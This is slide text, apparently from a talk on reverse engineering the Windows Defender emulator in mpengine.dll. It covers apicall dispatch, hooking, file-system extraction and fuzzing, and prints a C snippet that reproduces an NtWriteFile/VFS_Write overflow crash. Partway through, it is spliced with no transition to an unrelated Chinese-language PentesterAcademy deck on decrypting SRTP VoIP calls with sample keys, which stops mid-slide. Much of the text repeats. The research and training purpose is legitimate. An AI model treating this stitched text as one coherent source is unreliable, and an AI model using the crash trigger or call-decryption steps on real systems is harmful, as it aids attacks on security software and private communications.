Vulnerability Research a. Understanding P0’s Vulnerabilities b. Bypassing Mitigations With apicall Abuse c. Fuzzing 5. Conclusion Fuzzing Emulated APIs ● Create a binary that goes inside the emulator and repeatedly calls hooked WinExec function to request new data, then sends that data to functions with native emulations ● Buffers in memory passed to external hook function to populate with parameters ● Could do fuzzing in-emulator too, but this is easier for logging results MpEngine.dll Input Generation Linux mpclient Binary Input Generation ● Borrow OSX syscall fuzzer code from MWR Labs OSXFuzz project*
 ● Nothing fancy, just throw random values at native emulation handlers
 ● Re-seed rand() at the start of each emulation session, just save off seeds in a log
 *github.com/mwrlabs/OSXFuzz NtWriteFile Overflow NtWriteFile is normally accessible and exported by ntdll.dll ● VFS_Write has to be triggered with special apicall Tavis’ inputs get sanitized out by NtWriteFileWorker before it calls down to VFS_Write LARGE_INTEGER L; L.QuadPart = 0x2ff9ad29fffffc25; NtWriteFile( hFile, NULL, NULL, NULL, &ioStatus, buf, 0x1, &L, NULL); L.QuadPart = 0x29548af5d7b3b7c; NtWriteFile( hFile, NULL, NULL, NULL, &ioStatus, buf, 0x1, &L, NULL); NtWriteFile Overflow NtWriteFile is normally accessible and exported by ntdll.dll ● VFS_Write has to be triggered with special apicall Tavis’ inputs get sanitized out by NtWriteFileWorker before it calls down to VFS_Write LARGE_INTEGER L; L.QuadPart = 0x2ff9ad29fffffc25; NtWriteFile( hFile, NULL, NULL, NULL, &ioStatus, buf, 0x1, &L, NULL); L.QuadPart = 0x29548af5d7b3b7c; NtWriteFile( hFile, NULL, NULL, NULL, &ioStatus, buf, 0x1, &L, NULL); I fuzzed NtWriteFile: ● ~7 minutes @ ~8,000 NtWriteFile calls / second ● Fuzzed Length arguments ● Reproduced Tavis’ crash, alternate easier to reach code path through NtWriteFile Unfortunately, patches for VFS_Write bug also fixed this Demo Fuzzing NtWriteFile Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research 5. Conclusion Summary We covered: ● Tooling and instrumentation ● CPU dynamic translation basics for x86 ● Windows environment and emulation for 32-bit x86 binaries ● A bit on vulnerability research Summary We covered: ● Tooling and instrumentation ● CPU dynamic translation basics for x86 ● Windows environment and emulation for 32-bit x86 binaries ● A bit on vulnerability research Not covered: ● CPU dynamic translation internals ○ Non-x86 architectures (x64, ARM, VMProtect, etc…) ○ Unpacker integration ● 16-bit emulation ● Threading model ● .NET analysis Also Inside mpengine.dll Also Inside mpengine.dll Unpackers Also Inside mpengine.dll Parsers Unpackers Also Inside mpengine.dll JS Engine - see my REcon Brx talk Parsers Unpackers Also Inside mpengine.dll JS Engine - see my REcon Brx talk Parsers Unpackers Other Scanning Engines Also Inside mpengine.dll JS Engine - see my REcon Brx talk Parsers Unpackers .NET Engine Other Scanning Engines Also Inside mpengine.dll JS Engine - see my REcon Brx talk Parsers Unpackers Tip: the Lua engine is for signatures - attackers can’t hit it .NET Engine Other Scanning Engines Antivirus Reverse Engineering ● People constantly talk about what AVs can or can’t do, and how/where they are vulnerable ● These claims are mostly backed up by Tavis Ormandy’s work at Project Zero and a handful of other conference talks, papers, and blogposts
 ● I hope we’ll see more AV research in the future Code & More Information github.com/0xAlexei Code release: ● OutputDebugStringA hooking ● “Malware” binary to go inside the emulator ● Some IDA scripts, including apicall disassembler Article in PoC||GTFO 0x19: ● OutputDebugStringA hooking ● Patch diffing and apicall bypass ● apicall disassembly with IDA processor extension module Conclusion 1. Exposition of how a modern AV uses emulation to conduct dynamic analysis on the endpoint 2. Discussion of emulator traits that malware may use to detect, evade, and exploit emulators 3. Demonstration of attacker / reverse engineer analysis process and tooling Thank You: ● Tavis Ormandy - exposing the engine, mpclient, sharing ideas ● Mark - hooking ideas ● Markus Gaasedelen - Lighthouse ● Joxean Koret - OG AV hacker ● Numerous friends who helped edit these slides Published presentation has 50+ more slides 
 Defender JS Engine slides / video:
 bit.ly/2qio857 @0xAlexei Open DMs github.com/0xAlexei Backup Slides Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research 5. Conclusion My Publications Fingerprinting consumer AV emulators for malware evasion using “black box” side-channel attacks ubm.io/2LuTgqX Surveying evasive malware behavior and defenses against it bit.ly/2sf0whA Reverse engineering Windows Defender’s JS engine bit.ly/2qio857 Defender 32-Bit Release Schedule 2017 ● 5/23 (P0 bugs fixed) ● 6/20 (more P0 bugs fixed) ● 7/19 ● 8/23 ● 9/27 ● 11/1 ● 12/6 (UK NCSC bugs fixed) 2018 ● 1/18 ● 2/28 ● 3/18 ● 4/3 (Halvar’s unrar bug fixed) ● 4/19 ● 5/23 ● 6/25 Patent Search “The present invention includes a system and method for translating potential malware devices into safe program code. The potential malware is translated from any one of a number of different types of source languages, including, but not limited to, native CPU program code, platform independent .NET byte code, scripting program code, and the like. Then the translated program code is compiled into program code that may be understood and executed by the native CPU…” Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research 5. Conclusion Reversing Process ● Static reversing in IDA ○ Bindiff for patch analysis 
 ● Dynamic analysis and debugging in GDB using Tavis Ormandy’s mpclient with extensive customization
 ● Coverage with a customized Lighthouse Pintool Dealing With Calling Conventions When calling mpengine.dll functions from mpclient: Difficulty of interoperability between MSVC and GCC compiled code ● Possible to massage compiler with __attribute__ annotations Easier solution - just hand-write assembly thunks to marshall arguments into the correct format Dealing With Calling Conventions When calling mpengine.dll functions from mpclient: Difficulty of interoperability between MSVC and GCC compiled code ● Possible to massage compiler with __attribute__ annotations Easier solution - just hand-write assembly thunks to marshall arguments into the correct format BYTE * __fastcall __mmap_ex ( pe_vars_t * v, // ecx unsigned int64 addr, // too big for edx unsigned long size, // edx unsigned long rights ); Dealing With Calling Conventions When calling mpengine.dll functions from mpclient: Difficulty of interoperability between MSVC and GCC compiled code ● Possible to massage compiler with __attribute__ annotations Easier solution - just hand-write assembly thunks to marshall arguments into the correct format BYTE * __fastcall __mmap_ex ( pe_vars_t * v, // ecx unsigned int64 addr, // too big for edx unsigned long size, // edx unsigned long rights ); apicall Custom “apicall” opcode used to trigger native emulation routines 0F FF F0 [4 byte immediate] apicall Custom “apicall” opcode used to trigger native emulation routines 0F FF F0 [4 byte immediate] immediate = crc32(DLL name, all caps) ^ crc32(function name) apicall Custom “apicall” opcode used to trigger native emulation routines 0F FF F0 [4 byte immediate] immediate = crc32(DLL name, all caps) ^ crc32(function name) $ ./mphashgen KERNEL32.DLL OutputDebugStringA KERNEL32.DLL!OutputDebugStringA: 0xB28014BB 0xB28014BB = crc32(“KERNEL32.DLL”) ^ crc32(“OutputDebugStringA”) apicall Custom “apicall” opcode used to trigger native emulation routines 0F FF F0 [4 byte immediate] 0F FF F0 BB 14 80 B2 apicall kernel32!OutPutDebugStringA immediate = crc32(DLL name, all caps) ^ crc32(function name) $ ./mphashgen KERNEL32.DLL OutputDebugStringA KERNEL32.DLL!OutputDebugStringA: 0xB28014BB 0xB28014BB = crc32(“KERNEL32.DLL”) ^ crc32(“OutputDebugStringA”) apicall Dispatch {x32, x64, ARM}_parseint checks apicall immediate value, may do special handling with g_MpIntHandlerParam or pass on to native emulation apicall Dispatch Function pointers to emulation routines and associated CRCs are stored in g_syscalls table Given a CRC, __call_api_by_crc dispatches to the corresponding emulation routine {x32, x64, ARM}_parseint checks apicall immediate value, may do special handling with g_MpIntHandlerParam or pass on to native emulation VDLL RE - apicall Disassembly Problem: apicall instruction confuses IDA’s disassembler VDLL RE - apicall Disassembly Problem: apicall instruction confuses IDA’s disassembler Solution: implement a processor extension module to support apicall disassembly HexRays Decompiler shows apicall as an inline assembly block VDLL RE - apicall Disassembly Some functions have exported names apicall stub functions are labeled by script Article in PoC||GTFO 0x19 explains how this all works IDA Processor Extension Module An IDA Processor Extension Module was used to add support for the apicall instruction
 Kicks in whenever a file named “*.mp.dll” is loaded Rolf Rolles’ examples were extremely helpful:
 msreverseengineering.com/blog/2015/6/29/transparent-deobfuscation-with-ida-processor-module-extensions msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part- one-x86-deobfuscation Instruction Analysis ● Invoked to analyze instructions
 ● If three bytes at the next instruction address are 0f ff f0 we have an apicall
 ● Note that the instruction was an apicall and that it was 7 bytes long, so the next instruction starts at $+7 Instruction Representation Represent the instruction with mnemonic “apicall” Represent the operand with the name of the function being apicall-ed to Labeling apicall Stubs Creating and naming functions with apicall instructions during autoanalysis is very slow Scan for apicall stub function signatures after autoanalysis Labeling apicall Stubs Creating and naming functions with apicall instructions during autoanalysis is very slow Scan for apicall stub function signatures after autoanalysis mov edi, edi call $+5 add esp, 0x4 apicall ... Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research 5. Conclusion Emulator Components CPU Emulation OS (Kernel) Emulation Persistent System State Malware Binary AV Instrumentation Other Scanning Engines In-Emulator OS Facilities nt!PEB Settings mpengine.dll ● CPU emulation ○ + Timing
 ● OS API emulation ○ + Timing
 ● Emulated environment ○ Settings, processes, file system, registry, network, etc
 ● Antivirus instrumentation and callbacks Process Interaction Since other processes don’t really exist, they can’t be interacted with like real processes ReadProcessMemory & WriteProcessMemory operations for processes other than the one under analysis fail 0x1234 is a handle to the emulated process under analysis VirtualReg - Virtual Registry ● Unlike VFS, registry is not exposed for direct interaction from with in the emulator, it can only be reached via advapi32.dll emulations ● advapi32.dll’s only natively emulated functions are those that deal with registry interaction WinExec Hook Good function to hook - emulator functions fine without it actually doing its normal operations 2 parameters - pointer and uint32 - can create an IOCTL-like interface, pointer to arbitrary data, uint32 to specify action UINT WINAPI WinExec(
 _In_ LPCSTR lpCmdLine,
 _In_ UINT uCmdShow
 Example: Extracting VFS File system is not stored in mpengine.dll - evidently loaded at runtime from VDMs - can’t be trivially extracted with static RE Example: Extracting VFS File system is not stored in mpengine.dll - evidently loaded at runtime from VDMs - can’t be trivially extracted with static RE Example: Extracting VFS File system is not stored in mpengine.dll - evidently loaded at runtime from VDMs - can’t be trivially extracted with static RE WinExec hook Outside of emulator apicall ExitProcess Hook Called at the end of emulation, even if our binary doesn’t call it directly Informs Pin when to stop tracing if under analysis Original KERNEL32_DLL_ExitProcess function needs to be called for emulator to function properly, so just call through to it Unique VDLL PDB Paths c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\autoconv\objfre\i386\autoconv.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\bootcfg\objfre\i386\bootcfg.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\cmd\objfre\i386\cmd.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\dfrgfat\objfre\i386\dfrgfat.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mmc\objfre\i386\mmc.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\msiexec\objfre\i386\msiexec.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\notepad\objfre\i386\notepad.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\rasphone\objfre\i386\rasphone.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\relog\objfre\i386\relog.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\replace\objfre\i386\replace.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\taskmgr\objfre\i386\taskmgr.pdb c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb d:\build.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lodctr\objchk\i386\lodctr.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\chkdsk\objfre\i386\chkdsk.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\compact\objfre\i386\compact.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\finger\objfre\i386\finger.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\fixmapi\objfre\i386\fixmapi.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ipv6\objfre\i386\ipv6.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\migpwd\objfre\i386\migpwd.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ping\objfre\i386\ping.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\wscript\objfre\i386\wscript.pdb d:\MPEngine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Microsoft.VisualBasic\Microsoft.VisualBasic.pdb d:\MPEngine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Data\System.Data.pdb d:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System\System.pdb d:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Windows.Forms\System.Windows.Forms.pdb d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Drawing\System.Drawing.pdb d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Runtime\System.Runtime.pdb d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb d:\pavbld\amcore\Signature\Source\sigutils\vdlls\Microsoft.NET\VFramework\mscorlib\mscorlib.pdb e:\mpengine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Xml\System.Xml.pdb e:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\rundll32\objfre\i386\rundll32.pdb f:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\explorer\objfre\i386\explorer.pdb f:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\lsass\objfre\i386\lsass.pdb f:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winlogon\objfre\i386\winlogon.pdb f:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\write\objfre\i386\write.pdb d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Runtime.InteropServices.WindowsRuntime\System.Runtime.InteropServices.WindowsRuntime.pdb Fake Config Files C:\\WINDOWS\system.ini ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] C:\\WINDOWS\win.ini ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMC=1 MAPIX=1 MAPIXVER= OLEMessaging=1 [MCI Extensions.BAK] aif=MPEGVideo aifc=MPEGVideo aiff=MPEGVideo asf=MPEGVideo asx=MPEGVideo au=MPEGVideo m1v=MPEGVideo m3u=MPEGVideo mp2=MPEGVideo mp2v=MPEGVideo mp3=MPEGVideo mpa=MPEGVideo mpe=MPEGVideo mpeg=MPEGVideo mpg=MPEGVideo mpv2=MPEGVideo snd=MPEGVideo wax=MPEGVideo wm=MPEGVideo wma=MPEGVideo wmv=MPEGVideo wmx=MPEGVideo wpl=MPEGVideo wvx=MPEGVideo Wininet.dll vdll Minimal internet connectivity emulation with wininet.dll File on local file system is used to simulate interaction with handles to internet resources Timing CPU tick count needs to be updated during instruction execution and OS emulation Like every other AV emulator I’ve looked at, Defender aborts execution on rdtscp Outline 1. Introduction 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research 5. Conclusion libdislocator libdislocator is a allocator included with AFL that does allocation in a way likely to increase the discovery rate for heap-related bugs Source: github.com/mirrorer/afl/tree/
 master/libdislocator I integrated libdislocator code (not published) into: loadlibrary/peloader/winapi/Heap.c Since it’s open source and implemented as in a simple single C file, we can easily drop in libdislocator code to instrument Windows heap API implementations in loadlibrary Offline Demos Screenshots of demos for online slide release - see presentation videos when released for live demos Demo Scanning with mpclient Scanning with mpclient Scanning with mpclient Demo Lighthouse Usage Tracing Timeline Engine Startup __rsignal(..., RSIG_BOOTENGINE, …) Pintool must be enlightened about custom loaded mpengine.dll location - take callback stub ideas from Tavis Ormandy’s deepcover Pintool github.com/taviso/loadlibrary/tree/master/coverage Tracing Timeline Engine Startup Initial Scan __rsignal(..., RSIG_BOOTENGINE, …) __rsignal(..., RSIG_SCAN_STREAMBUFFER, …) Pintool must be enlightened about custom loaded mpengine.dll location - take callback stub ideas from Tavis Ormandy’s deepcover Pintool github.com/taviso/loadlibrary/tree/master/coverage Tracing Timeline Engine Startup Initial Scan Emulator Startup __rsignal(..., RSIG_BOOTENGINE, …) __rsignal(..., RSIG_SCAN_STREAMBUFFER, …) Pintool must be enlightened about custom loaded mpengine.dll location - take callback stub ideas from Tavis Ormandy’s deepcover Pintool github.com/taviso/loadlibrary/tree/master/coverage Tracing Timeline Engine Startup Initial Scan Emulator Startup Binary Emulation Binary calls hooked WinExec emulation with params for start __rsignal(..., RSIG_BOOTENGINE, …) __rsignal(..., RSIG_SCAN_STREAMBUFFER, …) Hooking Defender’s emulation functions for WinExec and ExitProcess allows us to know when emulation starts and stops* *ExitProcess is called at the end of every emulation session automatically - I believe this is because setup_pe_vstack puts it at the bottom of the call stack, even for binaries that do not explicitly return to it Pintool must be enlightened about custom loaded mpengine.dll location - take callback stub ideas from Tavis Ormandy’s deepcover Pintool github.com/taviso/loadlibrary/tree/master/coverage Tracing Timeline Engine Startup Initial Scan Emulator Startup Binary Emulation Emulator Teardown Emulator calls ExitProcess Binary calls hooked WinExec emulation with params for start __rsignal(..., RSIG_BOOTENGINE, …) __rsignal(..., RSIG_SCAN_STREAMBUFFER, …) Hooking Defender’s emulation functions for WinExec and ExitProcess allows us to know when emulation starts and stops* *ExitProcess is called at the end of every emulation session automatically - I believe this is because setup_pe_vstack puts it at the bottom of the call stack, even for binaries that do not explicitly return to it Pintool must be enlightened about custom loaded mpengine.dll location - take callback stub ideas from Tavis Ormandy’s deepcover Pintool github.com/taviso/loadlibrary/tree/master/coverage Tracing Timeline Engine Startup Initial Scan Emulator Startup Binary Emulation Emulator Teardown Emulator calls ExitProcess Binary calls hooked WinExec emulation with params for start __rsignal(..., RSIG_BOOTENGINE, …) __rsignal(..., RSIG_SCAN_STREAMBUFFER, …) Collect coverage information Hooking Defender’s emulation functions for WinExec and ExitProcess allows us to know when emulation starts and stops* *ExitProcess is called at the end of every emulation session automatically - I believe this is because setup_pe_vstack puts it at the bottom of the call stack, even for binaries that do not explicitly return to it Pintool must be enlightened about custom loaded mpengine.dll location - take callback stub ideas from Tavis Ormandy’s deepcover Pintool github.com/taviso/loadlibrary/tree/master/coverage Pintool Tracing Pintool Tracing Loading Coverage File IDA Analysis Demo Hooking OutputDebugStringA Hooking OutputDebugStringA Hooking OutputDebugStringA Hooking OutputDebugStringA Hooking OutputDebugStringA Hooking OutputDebugStringA Demo Dumping The File System Dumping The File System Dumping The File System Dumping The File System Dumping The File System Dumping The File System Dumping The File System Demo Disassembling apicall Disassembling apicall Disassembling apicall Demo Fuzzing NtWriteFile Fuzzing NtWriteFile Fuzzing NtWriteFile Fuzzing NtWriteFile Fuzzing NtWriteFile Fuzzing NtWriteFile Fuzzing NtWriteFile Demo apicall abuse apicall Abuse - OutputDebugStringA apicall Abuse - NtControlChannel apicall Abuse - OutputDebugStringA
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More1on:1en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange11 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ RSA1(⾮非对称加密)1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 现状 •  ⽆无法通过监听流量量恢复ECDHE/DHE派⽣生的密钥 1 •  对于RSA,获取到服务器器私钥即可解密流量量 11 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ TLS流量量(SIP1over1TLS)1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Diffie1Hellman密钥交换 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 未解码的SRTP流量量 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 解码 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 解码为RTP1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 检查RTP流 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 分析RTP流 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 播放RTP流 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 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GitHub:1github.com/gteissier/srtp-decrypt111 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SRTP解密: 安装前的准备 •  Installing1libgcrypt1 1 1 1 1 1 •  Installing1libpcap1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SRTP解密: 安装 •  Cloning1 1 1 1 1 •  Compiling1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SRTP解密: 准备完成 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SRTP解密: 复制SRTP密钥 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SRTP解密: UDP端⼝口 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SRTP解密: 解密SRTP流量量 指令:1./srtp-decrypt1-k1uK+RfjSi9/fUFr8zoJu6zdqPw6MGtONhgX4yqwRj1<1../ Normal_Call_two_parties.pcap1>1decoded.raw11 1 •  -k111111:11111Defined1SRTP1key11(该例例为uK+RfjSi9/fUFr8zoJu6zdqPw6MGtONhgX4yqwRj)1 •  Normal_Call_two_parties.pcap11 1输⼊入⽂文件1 •  decoded.raw1 1 1 1输出⽂文件1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SRTP解密: decoded.raw1 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PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp: 安装 •  Cloning1 1 1 1 1 1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp: 安装 •  Configure1 1 1 1 1 1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp: 安装 •  Make1 1 1 1 1 1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp: 准备完成 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1SRTP密钥 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1复制SRTP密钥 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1过滤单⼀一发送者 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1过滤单⼀一RTP流 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1导出过滤的流量量 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1保存导出流量量 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1指令 •  ./rtp_decoder1-a1-t1101-e11281-b12stvabBcXXf3HtaHCSsB8WACeRBst9f7lwLqlzqE1*1<1./ Normal_Call_two_parties_Exported_RTP.pcap1 1 •  -a 1111111111使⽤用消息验证1 •  -t11111111111111认证标签⼤大⼩小(80位,即10字节)1 •  -e1111111111111加密密钥的⻓长度,该例例使⽤用AES_CM_128_HMAC_SHA1_801 1111111111密钥⻓长度是128位1 •  -b1111111111111ASCII格式的SRTP密钥1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1指令输出 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1text2pcap的帮助信息 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1text2pcap1 •  text2pcap1-t1"%M:%S."1-u110000,100001-1-1>1./Normal_Call_two_parties_Decrypted.pcap1 1 •  -t1111111111111111111111111将数据包前的⽂文本视为⽇日期和时间 •  %M:%S111111111111111时间格式 •  -u111111111111111111111111使⽤用既定的源、⽬目的端⼝口预先设置UDP数据包头部 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1解密RTP流量量 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1解密后的流量量 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1解码 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1解码为RTP1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1解码后的RTP流量量 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1分析RTP流 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1分析RTP流 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Libsrtp:1播放解密后的通话 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 其它重要的部分?1 •  DTMF1 1 •  短消息(SMS)1 1 •  导出通话 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ RTP1DTMF1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ SIP消息 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ PCAP2WAV:1在线⼯工具 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ PCAP2WAV:1上传PCAP并下载Wav1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ PCAP2WAV:1audacity中显示的Wav⽂文件 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ PCAP2WAV:1离线脚本 •  Bash脚本⽤用于从VoIP通话中提取⾳音频 •  Outputs1.wav为输出⽂文件 •  使⽤用tshark和sox1 1 •  GitHub:1https://gist.github.com/avimar/d2e9d05e082ce273962d742eb9acac1611 1 1 1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ PCAP2WAV:1帮助信息 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ PCAP2WAV:1安装tshark和sox1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ PCAP2WAV:1运⾏行行⼯工具 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ PCAP2WAV:1⽬目录内容 •  运⾏行行脚本前的⽬目录内容 1 1 1 1 •  运⾏行行脚本后的⽬目录内容 1 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ PCAP2WAV:1audacity中显示的Wav⽂文件 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ VoIPShark1 •  ⼀一系列列Wireshark插件的集合 –  解密VoIP通话 –  导出通话⾳音频 –  流量量总览 (扩展,1SMS,1DTMF)1 –  基本VoIP攻击 •  使⽤用与Wireshark相同的GPL1 •  Github:1github.com/pentesteracademy/voipshark11 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ VoIPShark:1开发背景 •  传统分析过程繁琐且复杂 •  ⼤大量量的⼯工具 –  需要编译,设置过程⽐比较耗时 –  使⽤用起来相对复杂 –  依赖⽤用户,容易易出错 •  解密过程中⽆无法保留留时间戳、IP地址等 1 •  不不⽀支持实时流量量显示 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 为什什么使⽤用wireshark的插件?1 •  即插即⽤用 •  插件来源 –  Lua脚本 –  编译的C/C++代码 1 •  利利⽤用Wireshark的强⼤大功能 1 •  独⽴立于操作系统 •  牢固的⽤用户基础 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ Wireshark插件类型 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 解析器器 •  解析载荷数据 1 •  解析对应部分的协议并把载荷传递给下⼀一个 1 1 1 解析流程图示例例 PentesterAcademy.co m/ ©PentesterAcademy.com PentesterAcademy.co m/ 链式解析器器 •  